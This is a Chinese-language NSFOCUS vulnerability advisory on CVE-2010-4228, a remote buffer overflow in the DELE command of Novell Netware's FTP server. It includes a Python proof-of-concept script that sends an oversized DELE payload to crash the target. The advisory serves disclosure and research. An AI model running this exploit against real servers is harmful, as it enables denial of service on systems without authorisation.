绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Novell Netware "NWFTPD.NLM" DELE命令远程缓冲区溢出漏洞

发布日期：2011-03-18
更新日期：2011-03-21

受影响系统：

Novell Netware 6.x

描述：

BUGTRAQ  ID: 46922
CVE ID: CVE-2010-4228

Novell Netware是一款商业性质的网络操作系统。

Novell Netware "NWFTPD.NLM" DELE命令在实现上存在远程缓冲区溢出漏洞，远程攻击者可利用此漏洞以内核级别的权限执行任意代码或造成拒绝服务。

在处理提供给DELE命令的参数时，应用程序将用户提供的数据复制到固定大小的栈缓冲区。

<*来源：Francis Provencher

  链接：http://www.zerodayinitiative.com/advisories/ZDI-11-106/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Francis Provencher （）提供了如下测试方法：

#!/usr/bin/python

import socket, sys

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25

host = (sys.argv[1])
data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47\x48\x48\x44\x43\x42\x41\x0d\x0a"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((host, 21))
    d=s.recv(1024)
    print (d)
    s.send("USER toto\r\n") #anonymous login so anything goes
    d=s.recv(1024)
    print (d)
    s.send("PASS toto\r\n")
    d=s.recv(1024)
    print (d)
    s.send(data)
    d=s.recv(1024)
    print (d)
    s.close()

    try:
        s.connect((host,21))
    except:
        print ("\r\n[i] Beep Beep, take a look to your Abend log file.")
except:
    print ("[i] Error")

建议：

厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.novell.com/security-alerts

浏览次数：3580
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客